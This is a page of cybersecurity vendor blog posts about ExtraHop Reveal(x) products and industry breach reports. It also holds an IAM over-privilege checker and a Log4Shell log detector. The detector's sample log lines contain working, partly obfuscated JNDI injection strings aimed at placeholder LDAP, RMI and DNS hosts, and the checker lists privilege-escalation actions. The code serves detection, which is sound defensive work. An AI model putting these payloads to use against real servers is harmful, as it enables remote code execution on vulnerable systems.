Paul Ditty

Reveal(x) NDR with Native CrowdStrike LogScale Integration

As part of the 9.3 release of the Reveal(x) network detection and response (NDR) module, ExtraHop customers can now use a native integration with CrowdStrike Falcon® LogScale to combine NDR telemetry with their XDR data. This enhanced functionality allows joint customers to send network logs from ExtraHop to Falcon LogScale for long-term storage and analysis, giving them broader and deeper visibility when identifying and responding to threats.

Get Even More Value from Reveal(x) NDR

ExtraHop empowers security analysts to act fast with the right tools and the features most useful to their role. The NDR module offers users a more streamlined experience with personalized dashboards and customized workflows to improve analysts’ productivity. The modularization also allows customers to easily add additional components—for IDS or packet forensics, for example—to their Reveal(x) deployment as their needs change.

With the 9.3 release, Reveal(x) NDR has expanded its detector coverage for lateral movement and post-compromise techniques. In addition, Reveal(x) NDR now features customizable enrichment links that make it easier for analysts to access even more threat intelligence from providers such as CrowdStrike and Recorded Future, as well as context from a CMDB. The NDR module also features new threat briefings that monitor for employee misuse of generative AI tools, MOVEit vulnerabilities, and other issues.

Integrations continue to play a key role in maximizing customization. The Reveal(x) NDR module offers improved detection filtering, together with SIEM and SOAR integrations, to reduce SOC alert noise. Meanwhile, Windows agent updates allow for a smoother installation and a greater ability to run EDR agents alongside Reveal(x) sensors.

CrowdStrike LogScale is Now Native to Reveal(x)

Reveal(x) 9.3 also includes a newly built native integration with the CrowdStrike Falcon LogScale observability and log management solution. This functionality will help customers using both Reveal(x) and Falcon integrate rich network telemetry with other security logs, increasing accuracy and reliability for threat hunters and analysts. The out-of-the-box integration gives customers a quick, simple way to gain visibility across the network and enrich SOC workflows.

With Reveal(x) NDR and Falcon Insight XDR, joint customers can continuously inventory all managed and unmanaged devices, rapidly detect attack behaviors, correlate available threat intelligence, and automatically quarantine impacted devices to stop breaches in progress.

The native integration brings together the power of two industry-leading cybersecurity solutions. CrowdStrike was named a Leader for the third consecutive time in the December 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms. In June, ExtraHop was named a Leader in the inaugural Forrester Wave™: Network Analysis and Visibility, Q2 2023, earning the highest possible scores in 20 out of 29 criteria.

Gartner, Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Chris Silva, 31 December 2022.

Gartner is a registered trademark and service mark and Magic Quadrant is a registered trademark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from CrowdStrike. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Read More
Paul Ditty

Zero Trust: ExtraHop IDS for Enhanced Government Security

Take a next-gen approach to securing sensitive information

By the end of government fiscal year 2024, all U.S. civilian government agencies must meet the zero trust goals set out in OMB memorandum M-22-09, which builds on CISA’s Zero Trust Maturity Model. To help agencies meet this directive, ExtraHop released a new IDS module for Reveal(x), its network detection and response platform. ExtraHop IDS is designed to address the unique security requirements of U.S. government agencies and support a zero trust security architecture.

Verify and Manage Information Access

Due to the sensitive nature of government data, agencies have historically opted for on-premises solutions. In recent years, however, these agencies have been pushed to prioritize and adopt cloud-based solutions. Even so, many agencies still deploy sensors that have limited cloud access or are disconnected entirely, which makes it harder for security analysts to manage them and to keep them updated with rules for detecting new malware.

Agencies are also moving toward more decentralized environments, where employees and contractors can access information that may originate from outside traditional federal agency perimeters. While legacy intrusion prevention systems (IPS) have had their place in defending against certain attacks, it only takes one breach to cause major damage.

These factors increase agencies’ attack surfaces and complicate their ability to maintain a strong security posture. ExtraHop IDS provides government customers with expanded detection coverage of known threats, and Reveal(x) lets analysts see every device, user, and asset on the network. With the 9.3 release of Reveal(x), each of the new modules (NDR, NPM, IDS, and Packet Forensics) comes with its own role-based data access controls.

Our flexible deployment options include both virtual and physical on-premises sensors for agencies with restricted cloud access or isolated networks. The physical sensors also come preloaded with tens of thousands of curated rules from trusted sources, including the Emerging Threats Pro (ET Pro) ruleset, and are updated daily. The ExtraHop REST API can be used to upload resources to disconnected sensors, providing additional support to government agencies with restricted cloud access.

How ExtraHop IDS Accelerates Zero Trust

An essential tenet of zero trust is the ability to inspect and analyze logged network traffic at the packet level. As attack surfaces continue to expand, leaning on IPS to prevent attacks will not be enough. Organizations need to be able to analyze both north-south and east-west network traffic at scale. Traditional IDS solutions have limited decryption capabilities and can miss critical detections. These products also struggle to identify new and evolving threats because they must maintain, review and manually update signature rulesets.

ExtraHop IDS can accelerate zero trust adoption by harnessing network data and tens of thousands of high-fidelity network signatures. Analysts can validate policy enforcement by monitoring and safeguarding network traffic—both east-west and north-south traffic—with enhanced decryption capabilities.

Along with network data, government agencies need the ability to search for and identify connections that might have malicious intent. By deploying ExtraHop IDS, analysts gain coverage for known malware, command-and-control communications, botnets, communication with drive-by sites, and other advanced threats. When new vulnerabilities emerge, updated rules can be pushed to sensors through the API workflow within minutes of being published.

An integrated approach with IDS as part of the Reveal(x) NDR platform provides deeper coverage and a seamless experience for civilian government agencies to implement zero trust initiatives faster and better defend IT environments from future attacks.

The latest release of Reveal(x) also includes native integration with the CrowdStrike Falcon LogScale observability and log management solution. Customers using both Reveal(x) and Falcon can respond quicker to advanced threats with enhanced precision.

ExtraHop was also named a Leader in the inaugural Forrester Wave™: Network Analysis and Visibility, Q2 2023. According to the report, ExtraHop has the largest market presence among the leaders.

Read More
Paul Ditty

Cloud Security Threats: CrowdStrike Highlights Cloud-Conscious Adversaries

Cloud environments are critical to an organization’s ability to innovate—which also makes them a prime target for a new class of cyberattackers: the cloud-conscious adversary.

In their 2023 Cloud Risk Report, CrowdStrike covers the tactics, techniques and procedures (TTPs) employed by these threat actors and how prolific they’ve become in their pursuit of information and financial gain.

Attackers are Exploiting Trusted Identities

The report highlights some staggering statistics: a 95-percent increase in cloud exploitation and a 288-percent increase in cloud-capable actors year over year. Breakout time, the time it takes an adversary to move laterally from the initially compromised host to another host in the victim environment, averaged 84 minutes, shorter than the previous year. This speed indicates these adversaries are getting more confident at infiltrating and operating in the cloud.

Cloud entitlements and permissions are notoriously complex, and it's not uncommon for a provider like AWS to expose thousands of distinct permissions. CrowdStrike notes that valid credentials play heavily in these incidents: adversaries steal them or obtain them through brute-force password attacks. Once inside, they move laterally through the cloud, evading defenses and requesting additional credentials to escalate privileges for greater access. Of the cloud incidents observed, CrowdStrike found that 67 percent of identity and access management (IAM) roles were "over-privileged", that is, granted more permissions than their workloads required.
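The over-privilege problem the report describes is measurable: compare what a role is allowed to do with what it is observed doing. The following is an added example, not code from the original post or from CrowdStrike or ExtraHop. The policy document, the action catalogue, and the set of observed actions are all constructed; in practice the observed set would come from CloudTrail or IAM Access Advisor, and the catalogue from the service authorization reference.

```python
"""Flag over-privileged IAM roles: wildcard grants and permissions never exercised."""
import fnmatch
import json

# Constructed subset of the IAM action catalogue, used to expand wildcards.
ACTION_CATALOGUE = [
    "s3:GetObject", "s3:PutObject", "s3:ListBucket", "s3:DeleteObject",
    "ec2:DescribeInstances", "ec2:DescribeVolumes", "ec2:RunInstances",
    "ec2:TerminateInstances", "iam:CreateUser", "iam:CreateAccessKey",
    "iam:AttachRolePolicy", "iam:PassRole", "sts:AssumeRole",
]

# Constructed role policy: a tight S3 grant, a read-only EC2 wildcard, and a
# dangerous iam:* on every resource.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": "arn:aws:s3:::app-assets/*"},
        {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:*", "Resource": "*"},
    ],
})

# Constructed: the actions this role was actually seen using in the review window.
OBSERVED_ACTIONS = {"s3:GetObject", "s3:ListBucket", "ec2:DescribeInstances"}

# Actions that let a principal mint new identities or credentials; granting these
# to a workload role is a classic cloud privilege-escalation path.
PRIVILEGE_ESCALATION_ACTIONS = {
    "iam:CreateUser", "iam:CreateAccessKey", "iam:AttachRolePolicy", "iam:PassRole",
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allow_statements(policy_json):
    """Yield the Allow statements of a policy document (Deny statements are ignored here)."""
    doc = json.loads(policy_json)
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") == "Allow" and "Action" in stmt:
            yield stmt


def expand_actions(patterns, catalogue=ACTION_CATALOGUE):
    """Expand IAM action patterns ('*' and '?' wildcards, case-insensitive) against a catalogue."""
    granted = set()
    for pattern in _as_list(patterns):
        for action in catalogue:
            if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                granted.add(action)
    return granted


def granted_actions(policy_json):
    """All concrete actions the policy allows, across every Allow statement."""
    granted = set()
    for stmt in allow_statements(policy_json):
        granted |= expand_actions(stmt["Action"])
    return granted


def wildcard_findings(policy_json):
    """Statements that grant a whole service (or everything) on every resource."""
    findings = []
    for stmt in allow_statements(policy_json):
        actions = _as_list(stmt["Action"])
        resources = _as_list(stmt.get("Resource", "*"))
        broad_action = any(a == "*" or a.endswith(":*") for a in actions)
        if broad_action and "*" in resources:
            findings.append({"actions": actions, "resources": resources})
    return findings


def unused_actions(policy_json, observed):
    """Granted actions that were never exercised: the over-privilege the report warns about."""
    return granted_actions(policy_json) - set(observed)


def escalation_paths(policy_json):
    """Granted actions that allow identity or credential creation."""
    return granted_actions(policy_json) & PRIVILEGE_ESCALATION_ACTIONS


def over_privilege_ratio(policy_json, observed):
    """Fraction of granted actions never used (0.0 means the role is right-sized)."""
    granted = granted_actions(policy_json)
    if not granted:
        return 0.0
    return len(granted - set(observed)) / len(granted)


if __name__ == "__main__":
    print("wildcard grants:", wildcard_findings(SAMPLE_POLICY))
    print("unused actions:", sorted(unused_actions(SAMPLE_POLICY, OBSERVED_ACTIONS)))
    print("escalation paths:", sorted(escalation_paths(SAMPLE_POLICY)))
    print("over-privilege ratio: %.3f" % over_privilege_ratio(SAMPLE_POLICY, OBSERVED_ACTIONS))
```

Run against the constructed policy, the checker reports one wildcard grant (iam:* on every resource), five granted actions that were never used (a 0.625 over-privilege ratio), and four of those unused actions as escalation paths. The catalogue is the limiting factor in real use: wildcard expansion is only as complete as the list of actions it is expanded against.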

Container Security Remains Tricky

Container workloads continue to grow in popularity for their smaller footprint relative to virtual machines (VMs) and their ease of deployment across multiple architectures. Unfortunately, the ephemeral nature of containers makes them difficult to secure. It's common for containers to be spun up, run, then spun down in a matter of minutes, making them even more difficult to discover. Furthermore, the layered nature of IaaS, PaaS, and serverless infrastructure increases the chances of blind spots or misconfigurations. CrowdStrike reports that 60 percent of observed container workloads lack properly configured protections.

Even when there is security in place, teams often lack visibility in these environments. Adversaries are able to access containers through external-facing services, such as APIs or SSH. Once inside, they can hide within existing containers—or create their own—to avoid defenses, which gives them time to introduce malicious code into the environment. The report also notes that incident response teams only get a partial view of container incidents, which means that compromised workloads are often missed.

Protect Cloud Workloads with Continuous Network Visibility

Cloud-conscious adversaries pose significant risk, but even the most sophisticated attackers leave a trail. Our strategic partnership with CrowdStrike combines Reveal(x) 360 network intelligence with Falcon endpoint data and threat intelligence for full-coverage detection, investigation, and response capabilities. Reveal(x) 360 lights up the east-west corridor and discovers post-compromise behaviors like lateral movement to help keep your cloud secure.

Reveal(x) 360 also unifies security across containerized environments and orchestration services with AI-powered peer group analysis to detect advanced threats as they occur in highly dynamic environments. Analysts can identify when threat actors may be using compromised credentials to access and use assets with malicious intent and stop them in their tracks—before they can reach the cloud.

Read More
Paul Ditty

2023 Verizon DBIR: Phishing for Financial Gain

If threat actors had a motto, it would be, "If it ain’t broke, don’t fix it.”

The Verizon 2023 Data Breach Investigations Report (DBIR) shows us that if a threat actor finds an attack method that works, they’re going to use it over and over.

Attackers Do it for the Money

Verizon classifies incidents into patterns, such as denial of service (DoS), basic web application attacks, social engineering, and system intrusion. These four patterns account for the majority of incidents and breaches, while miscellaneous errors and stolen assets are less common. System intrusion accounted for roughly 40 percent of all breaches, and 80 percent of these intrusions involved ransomware.

Unsurprisingly, 95 percent of all reported breaches were financially motivated. Verizon also notes that ransomware was present in 24 percent of breaches. That number is consistent with the previous year, which the report labels as statistically stable. If an organization suffers a breach, one in four times it will involve holding something valuable for a hefty payout.

Social Engineering is on the Rise

Stolen credentials remained the most widely used method to gain access, representing nearly 49 percent of all reported breaches. To harvest credentials, attackers often rely on social engineering techniques, including phishing and pretexting.

Pretexting is most commonly used in business email compromise (BEC), and the frequency of these attacks nearly doubled year over year. Attackers, often impersonating a CEO or high-ranking manager, employ different techniques to convince a victim to disclose sensitive data. For example, they typically apply a sense of urgency, forge documents (like a petition or questionnaire), or hijack existing communications between an employee and a manager. If they don’t get what they want, they quickly escalate the situation and threaten the targeted employee.

These attacks are extremely popular for a reason: they work. Verizon states that the median amount stolen in a BEC incident is now $50,000.

If it’s an Exploit, it’s Probably Log4j

It was surprising to see that exploitation of vulnerabilities accounted for only five percent of all reported incidents. Of these, a whopping 90 percent involved Log4j. The vulnerability (CVE-2021-44228) was disclosed in December 2021.

Verizon reports that over 32 percent of all Log4j scanning activity occurred in the first 30 days after disclosure, and the biggest spike in scanning activity hit within the first 17 days. Thanks to a quick patch response by the industry, many organizations were able to mitigate what could have been a major disaster. The report also notes that only about 20 percent of the exploitation incidents contributed to the 2023 DBIR named the specific vulnerability involved, so the 90 percent figure describes those named cases; that Log4j dominates them still points to how widely the vulnerable library was deployed.
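Most of the Log4j scanning the report counts was visible in ordinary HTTP logs, but the attackers quickly wrapped the JNDI lookup in nested lookups and URL encoding to slip past naive string matches. The following is an added example, not code from the original post or from Verizon or ExtraHop: a detector that undoes the common obfuscations before matching, run over a constructed set of web server access log lines. It is also an instance of the signature-style matching the IDS posts on this page describe. The log lines, IP addresses and hostnames are all constructed.

```python
"""Detect Log4Shell (CVE-2021-44228) scanning in HTTP access logs, including obfuscated lookups."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access log lines (combined format: client, timestamp, request, status,
# size, referer, user-agent). The last line is benign and must not fire.
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:14:05:02 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.9:1099/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '198.51.100.9 - - [11/Dec/2021:09:12:55 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.example/z}"',
    '198.51.100.10 - - [11/Dec/2021:09:13:01 +0000] "POST /login HTTP/1.1" 302 0 "${${env:NaN:-j}ndi:dns://203.0.113.5/t}" "Mozilla/5.0"',
    '198.51.100.11 - - [11/Dec/2021:09:14:20 +0000] "GET /%24%7Bjndi%3Aldaps%3A%2F%2F203.0.113.6%2Fq%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [12/Dec/2021:10:00:00 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body with no nested braces or '$'.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup with its scheme (ldap, ldaps, rmi, dns, iiop, ...).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
LOG_DATE = re.compile(r"\[(\d{2}/[A-Za-z]{3}/\d{4})")


def _resolve(body, original):
    """Evaluate one innermost lookup the way Log4j 2 would for the obfuscation idioms seen in the wild.

    ${anything:-default} yields the default (covers ${::-j} and ${env:NaN:-j});
    ${lower:x} / ${upper:x} change case; anything else is left untouched.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        if name.lower() == "lower":
            return arg.lower()
        if name.lower() == "upper":
            return arg.upper()
    return original


def normalize(text, max_rounds=20):
    """URL-decode twice, then resolve nested lookups from the inside out until stable."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        resolved = LOOKUP.sub(lambda m: _resolve(m.group(1), m.group(0)), text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(raw):
    """Return the lower-cased JNDI scheme if the text carries a lookup, else None."""
    match = JNDI.search(normalize(raw))
    return match.group(1).lower() if match else None


def scan_log(lines):
    """(client_ip, scheme) for every line carrying a JNDI lookup in any field."""
    hits = []
    for line in lines:
        scheme = find_jndi(line)
        if scheme:
            hits.append((line.split(" ", 1)[0], scheme))
    return hits


def hits_per_day(lines):
    """Count of scanning lines per log day, the shape of the spike the DBIR describes."""
    counts = Counter()
    for line in lines:
        if find_jndi(line):
            date = LOG_DATE.search(line)
            counts[date.group(1) if date else "unknown"] += 1
    return dict(counts)


if __name__ == "__main__":
    for client, scheme in scan_log(LOG_LINES):
        print(f"JNDI lookup ({scheme}) from {client}")
    print(hits_per_day(LOG_LINES))
```

Resolving lookups before matching is what separates a useful signature from one that only catches the textbook `${jndi:ldap://` string; the literal `${version}` in the last line shows the normalizer leaving an ordinary template untouched. Keep `max_rounds` bounded, since an attacker can nest lookups arbitrarily deep to make a naive resolver spin.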

The Network as the Definitive Source of Cybertruth

What the attack patterns and techniques covered in the Verizon Data Breach Investigations Report have in common is that they are all network detectable with Reveal(x). Reveal(x) performs continuous packet capture, stream reassembly, full protocol parsing, and decryption of all network traffic in the east-west corridor to provide organizations with 360-degree visibility into user and device activity across their network and to detect lateral movement, privilege escalation, and other post-compromise attack techniques.

Reveal(x) also automatically discovers and identifies all assets communicating across a network—whether they’re managed or unmanaged—as well as the protocols and ports they use to communicate. In addition, it leverages machine learning to baseline normal network behavior and detect deviations from it. By combining machine learning with real-time asset discovery, Reveal(x) can identify when threat actors may be using compromised credentials to access and use assets with malicious intent.

When you have complete visibility, patterns become easier to detect. No matter how inventive an attacker may become, they can’t outsmart the network.

Read More
Paul Ditty

Global CSO Explains the Value of Cybersecurity

Security leaders are constantly under pressure to demonstrate the value and impact of their cybersecurity programs and security technology investments. That pressure is even greater in times of economic uncertainty.

During a recent ExtraHop webinar titled Demonstrating the Value of Cybersecurity, Roland Cloutier, a global CSO and Digital Business Enablement Executive, shared methodologies and strategies he’s used to promote the value of cybersecurity over the course of his career. Roland has worked for TikTok, ADP, EMC, the U.S. Department of Defense, and the Department of Veterans Affairs.

Roland also introduced the concept of business operations protection and walked through what it takes to be a successful business and technical partner to the C-suite.

The First Principles of Business Operations Protection

You can’t protect what you don’t understand. It’s critical to know how the business goes to market, the products it makes, its margins, the competitive landscape, and everything in between. That way, you have a stronger understanding of what needs to be protected.

Have principled priorities through Value at Risk. Once you understand what parts of the business hold more weight, such as the supply chain or manufacturing, you can make more informed decisions on where security needs to be implemented or improved.

Drive business through market trust enablement. Now that you’ve aligned the business’s goals and how it operates to create an effective security strategy, you can build trust—both from within the organization and the greater industry—to grow and deliver a greater ROI. Established companies with a trusted security posture are going to drive customers to partner with them.

Being a Successful Business Partner

To build an effective cybersecurity or business operations protection program, Roland maintained that security leaders need to start “by being a better business partner.” He defined this practice from a business perspective and a financial perspective.

On the business side, Roland noted that security executives still need to “run the business like a business” while maintaining organizational efficiency and metrics. He recommended that CSOs and CISOs define achievable cybersecurity capabilities within the company and be transparent about limitations preventing them from providing certain services. This clarity on priorities allows security leaders to set consistent expectations and build trust with both board members and customers. “Happy customers are repeat customers,” Roland reminded viewers.

From the financial perspective, Roland stressed the importance of thinking like a business owner. While growth is almost always top of mind, it may not always be the most important goal. At any given moment, the economy or industry may demand a different approach. When thinking about your company’s goals, Roland recommended asking yourself these questions:

  • Are we taking the right financial steps?

  • How are we doing service cost analysis on the offerings we’re delivering?

Being finance-focused shows other executives and board members a level of accountability and responsibility that they can get behind and support. “It’s all about risk versus reward,” Roland said. “Being cognisant of what the organization is going through and making intelligent and risk-based decisions is critical.”

Watch the webinar recording to learn more about Roland’s philosophy on business operations protection and how to establish a greater ROI in your organization’s cyber defense strategy.

Read More
Paul Ditty

Mandiant M-Trends 2023: Attackers Won’t Back Down

In its 2023 M-Trends Special Report, Mandiant is calling 2022 “the year of the aggressive threat actor.” The incident response company observed a willingness among adversaries to do whatever it took to achieve their objectives, which weren’t always financially motivated. They employed bullying tactics, impersonated employees, and were relentless in their use of phishing. But defenders claimed some victories, too.

Dwell Time is Down, Data Theft is Up

One success that defenders saw last year was a drop in attackers’ global median dwell time, from 21 days in 2021 to 16 days in 2022. This overall improvement in detection “reflects a growing recognition of the critical role partnerships and information exchange play in building a resilient cybersecurity ecosystem,” Mandiant notes. However, median dwell time for ransomware intrusions increased from five days to nine days, meaning those adversaries went undetected for longer, often because they employed “living off the land” techniques, using the victim’s native tools, applications, and protocols to evade security controls and detection.

Another interesting statistic highlights a small drop in a common motivation for attacks: The proportion of adversaries seeking financial gain decreased from 30 percent to 26 percent in 2022. However, data theft increased from 29 percent to 40 percent, which implies threat actors are stealing information for other purposes rather than holding the data for ransom.

Targeted Attacks and Industries

Cyber espionage proved highly prevalent in 2022, with 25 percent of attacks targeting government bodies, a sharp jump from 9 percent the previous year. The primary reason for this increase is the Russian invasion of Ukraine, Mandiant points out. Multiple states conducted intrusions and intelligence-gathering operations, while a volunteer cyber army came to Ukraine’s aid to defend its networks and perform counter-reconnaissance.

Professional businesses and financial institutions followed governments in most attacks that Mandiant documented, at 14 percent and 12 percent, respectively. These numbers remain consistent with the previous year. As Mandiant reports, “These industries remain attractive targets for both financially and espionage motivated actors.”

Attack Vectors and Infiltration Techniques

Exploits remained the most common initial infection vector, comprising 32 percent of globally identified attacks, followed by phishing and stolen credentials. Of these exploits, the Log4j vulnerability (CVE-2021-44228) was identified most frequently, followed by F5 BIG-IP iControl REST (CVE-2022-1388) and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954). Each was notable for its ease of exploitation, and even after patches were available, these vulnerabilities continued to cause considerable damage on systems that had not applied them. (It’s worth noting that ExtraHop Reveal(x) provides detections for these and other vulnerabilities.)

Mandiant continued to see BEACON as the most frequently identified malware in its investigations, at 15 percent in 2022, down from 28 percent in 2021. BEACON is the backdoor component of the Cobalt Strike platform, which adversaries routinely repurpose. LockBit and Basta malware each accounted for 2 percent of all attacks. An interesting omission was SUNBURST, which was responsible for nine percent of malware investigations in 2021 but didn’t make this year’s list.

Threat Actors are Breaking the Rules

While financial gain has declined as a motivation over the past few years, it’s still the primary focus for 48 percent of threat groups, Mandiant notes. The remaining groups were driven by espionage, disruption, or notoriety. Phishing attacks rose significantly, from 12 percent of all attacks in 2021 to 22 percent last year. Mandiant points to a new method beyond email scams: attackers creating cloud-based call centers to impersonate employees and steal credentials, known as voice phishing, or “vishing.”

“We’re seeing attackers cause bigger impacts with less skills,” the report says. “They’re also more brazen, and willing to get much more aggressive and personal to achieve their goals. They will bully and threaten, and ignore the traditional cyber rules of engagement. It’s not enough to just protect systems these days, employees need to be protected as well.”

Cyber hygiene isn’t enough to stop this new era of aggressive cyber attackers, the report concludes. Companies, municipalities, financial institutions—any organization with sensitive data—should implement a zero trust security mindset. Even as cybersecurity measures improve, adversaries have repeatedly shown they will find a way to gain access.

Read More
Paul Ditty

Impressions from RSA Conference 2023

This year’s RSA Conference proved to be a huge success. The Moscone Center in San Francisco hosted nearly 50,000 cybersecurity professionals over four days of presentations, speaking sessions, and booth demonstrations. ExtraHop experts who were on site noted a strong sense of curiosity and excitement as they spoke with attendees on the expo floor. The conference marked a return to relative normalcy and offered a much-needed break from the virtual office.

Here are a few highlights:

The Black Box Experience

This year, ExtraHop revealed a mysterious and exciting new experience at the booth. Along with a big announcement of new features and integrations, attendees had the opportunity to enter the Black Box—a giant cube with an immersive representation of what is happening in the network.

The response from the floor was very positive, with many praising the concept and visuals. Its size drew a high volume of customer and partner engagement.

Partnering with CrowdStrike

Aside from the Black Box, the ExtraHop booth was abuzz with people attending daily co-sponsored chats with our integration partner, CrowdStrike. Experts from both companies discussed the complementary role network detection and response (NDR) and endpoint detection and response (EDR) play in helping companies mitigate cyber risk. For some, these conversations were the entry point to learn more about how NDR fills gaps in security—from monitoring IoT devices to detecting suspicious network behavior.

We also co-hosted a threat hunting challenge, which allowed participants to get a hands-on experience of how ExtraHop Reveal(x) detects and stops threats in the network. It was a popular event that awarded top scores daily and a grand prize at the end of the week.

Jeff Costlow’s Speaking Session

Jeff Costlow, Deputy CISO at ExtraHop, presented his session Semi-Advanced Threats vs. The Semi-Critical Infrastructure. He discussed the rise of a new type of threat actor that’s emerging from the dismantling of state-sponsored groups. The targets of this new type of threat actor include local food suppliers, public transportation services, and other sectors of what Costlow calls “semi-critical infrastructure.” He explained why these actors are targeting this sector, the economic ramifications, and advice for combatting this threat.

NDR is Gaining Momentum

NDR may not yet have the recognition that EDR and SIEM have among security professionals, but awareness was clearly growing at this year’s RSA Conference, judging by the crowds coming to the ExtraHop booth. Attendees who stopped by to explore the Black Box, participate in a hunter challenge, or listen to a lightning talk from ExtraHop and CrowdStrike walked away with a much greater appreciation for the unique role that the network plays in threat detection and response.

If you weren’t able to attend RSA Conference, check out our demo to see for yourself—and we’ll see you at the next big event!

Read More
Paul Ditty

Introducing ExtraHop IDS: Next-Gen Intrusion Detection

ExtraHop today announced the next evolution of intrusion detection technology with ExtraHop IDS. This new solution, combined with the Reveal(x) network detection and response (NDR) platform, provides companies with expanded detection coverage through tens of thousands of reputable network signatures.

When deployed with Reveal(x) or Reveal(x) 360, ExtraHop IDS provides security teams with high-fidelity, real-time detection of known and unknown malware and exploits, including detection of known threats hiding in encrypted network traffic. It also facilitates advanced triage and investigation through risk scoring and correlation capabilities, as well as native and turn-key integrations with CrowdStrike, Splunk, and other leading security providers.

The Problem ExtraHop IDS Solves

Many organizations are finding that the legacy IDS tools they deployed to meet regulatory compliance and cyber insurance requirements don’t provide quality alerts: they produce a high volume of alerts with little to no context for investigation and response, even as an increasing number of threats slip past them. Moreover, most IDS solutions can’t detect threats in encrypted network traffic, which creates a huge blind spot for organizations at a time when roughly 85% of network traffic is encrypted. This blind spot puts internet-facing assets like email and web servers at greater risk of being exploited as an entry point by bad actors.

While IDS was designed to detect perimeter attacks like port scanning, SQL injection, and buffer overflows, new adversary tactics, techniques, and procedures have exposed the limitations of IDS tools. As attackers have become more strategic and malicious, organizations need to pivot to a comprehensive defense solution.

ExtraHop IDS Capabilities and Benefits

ExtraHop IDS offers critical capabilities to streamline workflows and more effectively stop threats:

  • Automated, high-fidelity signature-based detections curated by the ExtraHop Threat Research team, based on feedback from thousands of real-world networks.

  • Rapid CVE detection with tens of thousands of signatures from reputable sources such as the Emerging Threats Pro (ET Pro) rule set.

  • Automated cloud updates to sensors within minutes of rules being published.

  • Integrated security technologies to reduce overhead, simplify management, and improve response time.

  • Out-of-band sensors eliminate any impact on network performance.

The combination of Reveal(x) with ExtraHop IDS allows customers to deploy and manage their cloud-enabled IDS sensors from the same console as their NDR sensors, which helps to streamline detection, investigation and response, and gives security leaders the opportunity to consolidate security technologies without compromising functionality. Customers also gain unrivaled network-based detection logic to identify malware command and control communications, known bad landing pages, botnets, communication with drive-by download sites, and other advanced threats. Our comprehensive rule set includes:

  • Major malware families covered by command and control channel and protocol.

  • Detection across all network-based threat vectors, from SCADA protocols and web servers to the latest client-side attacks served by exploit kits.

  • The most accurate malware call-back, dropper, command-and-control, obfuscation, exploit kit related, and exfiltration signatures the industry can offer.

  • Coverage for in-the-wild CVE vulnerabilities, including Microsoft MAPP and Patch Tuesday updates.

CISOs and security teams can no longer support operationally intensive technologies like legacy IDS. They need a more comprehensive security posture that can unmask modern adversaries, reduce dwell time, improve operational efficiencies, and support compliance requirements. To learn more about ExtraHop IDS and how it can take your network security to the next level, read the solution brief.

Read More
Paul Ditty

Modern Threat Hunting with ExtraHop Reveal(x)

Today’s threat landscape demands a lot from security analysts: unwavering attention, unflagging energy, and an uncanny ability to hunt for unknown threats on an organization’s network.

In a recent video, ExtraHop expert Josh Snow explains step by step how to proactively hunt for threats with Reveal(x). He begins by detailing the three key components:

  • Coverage. This includes data sources (logs, agents, network data), encrypted traffic, communication between devices and the network, and the correlation between these disparate streams.

  • Workflow. How easily can analysts reach the underlying telemetry, correlate it into context-driven insights, and search across large volumes of that data?

  • Retention. The ability to look back through historic organizational data to uncover and contain dormant threats.

These three components give analysts a rich data source and the broad-spectrum coverage required to hunt for advanced threats, which is how members of the ExtraHop Detections Research and Data Science teams detected and contained a Cobalt Strike attack on an organization's network environment.

Watch the video for a comprehensive guide to threat hunting with Reveal(x).

Paul Ditty

What is an Intrusion Detection System (IDS)?

Intrusion detection systems (IDS) gained popularity in the 1990s as a way to detect attacks against known weaknesses in software. Their detection strategy relies on signatures: patterns that identify traffic associated with known exploits of documented software vulnerabilities. When an IDS matches a signature, it sends an alert to the security operations center (SOC) so analysts can investigate its severity.

In the early 2000s, IDS was considered the “source of truth” for the network, so much so that intrusion detection technology became a compliance requirement for the Payment Card Industry Data Security Standard (PCI DSS). Many cyber insurers also require some form of IDS for coverage.

Over the roughly 25 years that IDS solutions have been a part of the security technology landscape, organizations relying on them have grown disillusioned with the technology. They’ve witnessed different attacks sneak past their IDS time and again.

While other security technologies have advanced, many IDS solutions still lack the ability to learn. They know only the signatures and exploits shipped as part of their detection methodology. The threat landscape has evolved so much that decades-old signature detection tells, at best, part of the story.

Machine Learning Strengthens Defense

